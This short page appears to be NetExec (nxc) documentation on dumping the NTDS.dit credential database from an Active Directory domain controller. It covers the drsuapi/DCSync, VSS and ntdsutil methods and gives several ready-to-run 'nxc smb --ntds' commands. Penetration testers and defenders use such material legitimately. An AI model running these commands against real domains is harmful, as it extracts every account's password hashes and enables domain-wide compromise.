Dump NTDS.dit

Dump the NTDS.dit from target DC using methods from secretsdump.py

Requires Domain Admin or Local Admin Priviledges on target Domain Controller

2 methods are available:   
(default) 	drsuapi -  Uses drsuapi RPC interface create a handle, trigger replication, and combined with   
						additional drsuapi calls to convert the resultant linked-lists into readable format  
			vss - Uses the Volume Shadow copy Service  
#~ nxc smb -u UserNAme -p 'PASSWORDHERE' --ntds
#~ nxc smb -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ nxc smb -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ nxc smb -u UserNAme -p 'PASSWORDHERE' --ntds vss

You can also DCSYNC with the computer account of the DC

There is also the ntdsutil module that will use ntdsutil to dump NTDS.dit and SYSTEM hive and parse them locally with secretsdump.py

#~ nxc smb -u UserNAme -p 'PASSWORDHERE' -M ntdsutil

Remember to play this music everytime you got DA

Last updated